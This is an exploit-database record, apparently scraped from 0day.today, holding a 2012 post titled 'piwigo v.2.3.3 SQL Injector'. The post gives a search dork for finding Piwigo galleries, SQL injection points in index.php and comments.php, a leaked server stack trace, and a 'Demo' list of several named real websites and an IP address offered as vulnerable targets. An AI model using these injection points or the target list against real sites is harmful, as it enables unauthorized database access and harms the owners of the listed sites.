{"id": "1337DAY-ID-17618", "lastseen": "2018-03-13T20:34:53", "viewCount": 4, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2018-03-13T20:34:53", "rev": 2}, "dependencies": {"references": [], "modified": "2018-03-13T20:34:53", "rev": 2}, "vulnersScore": 0.2}, "type": "zdt", "sourceHref": "https://0day.today/exploit/17618", "description": "Exploit for php platform in category web applications", "title": "piwigo v.2.3.3 SQL Injector", "cvelist": [], "sourceData": "+--------------------------------------------------------------------------------------------------------------------------------+\r\n# Exploit Title : piwigo <== SQL Injector\r\n# Date : 26-02-2012\r\n# Author : TeaM MosTa\r\n# Version : 2.3.3\r\n# Dork : \"Propuls\u00e9 par Piwigo\"\r\n# Tested on : Window 7 , B-T.5\r\n# Greetz : milw0rm 1337day.com\r\n+--------------------------------------------------------------------------------------------------------------------------------+\r\n+------------------------------------------[ Exploit by TeaM MosTa ]--------------------------------------------------+\r\nExploit\r\nhttp://127.0.0.1/piwigo/index.php?/category/1\" <===> {SQL}\r\ncomments.php?display_mode=albums <===> {SQL}\r\n#1 my_error /home/fanslyon/public_html/piwigo/include/functions.inc.php(637)\r\n#2 pwg_query /home/fanslyon/public_html/piwigo/include/functions.inc.php(1275)\r\n#3 hash_from_query /home/fanslyon/public_html/piwigo/include/functions_category.inc.php(393)\r\n#4 get_cat_id_from_permalinks /home/fanslyon/public_html/piwigo/include/functions_url.inc.php(483)\r\n#5 parse_section_url /home/fanslyon/public_html/piwigo/include/section_init.inc.php(123)\r\n#6 include /home/fanslyon/public_html/piwigo/index.php(27)\r\nDemo :\r\nhttp://www.fanslyon.com/piwigo/index.php?/category/53' {SQL}\r\nhttp://endlersman.paysages-aquatiques.com/archivphoto/piwigo/picture.php?/194/categories%22{SQL}\r\nhttp://endlersman.paysages-aquatiques.com/archivphoto/piwigo/index.php?/category/53%27{SQL}\r\nhttp://88.191.128.71/piwigo/piwigo/picture.php?/194/categories%22{SQL}\r\nhttp://photos.ugtg.org/picture.php?/194/categories%22{SQL}\r\nhttp://www.nature-granville-chausey.com/picture.php?/40/category/4%22\r\nhttp://tedybear.fr/piwigo/index.php?/category/194%22\r\n\r\n+----------------------------------------------------------------------------------------------------------------------------------+\r\nTnKs To :\r\n[# Ked Ans | 1337day.com Inj3ct0r Exploit DataBase | Original MosTa | TrOoN | HacKer_Fire |#]\r\n[# K\u00e0r\u00e0m Eddi\u00f1\u00e9 BiL\u00e0mi | security-ray | Exploit-Db | metasploit | backtrack| walid_rires|#]\r\n[#Mail: [email\u00a0protected] #]\r\n\r\n\n\n# 0day.today [2018-03-13] #", "published": "2012-03-04T00:00:00", "references": [], "reporter": "TeaM MosTa", "modified": "2012-03-04T00:00:00", "href": "https://0day.today/exploit/description/17618", "immutableFields": []}

{}